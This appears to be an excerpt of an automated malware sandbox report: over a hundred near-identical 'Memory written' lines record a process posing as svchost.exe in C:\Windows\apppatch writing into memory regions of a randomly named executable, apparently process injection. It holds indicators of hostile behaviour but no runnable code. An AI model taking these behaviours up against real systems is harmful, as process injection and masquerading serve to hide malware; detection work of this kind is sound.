Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1452000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1020000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1021000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1022000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1072000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1190000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1191000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1192000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1551000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1552000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1340000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1341000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1342000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1392000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1580000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1581000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1582000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1022000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 880000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 881000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 882000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 8D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: DF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: E92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: EE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1460000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1461000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1462000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1380000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1381000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1382000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 13D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 620000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 621000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 622000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 672000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1200000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1201000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1440000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1441000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1442000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1492000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1042000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1122000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B91000Jump to behavior
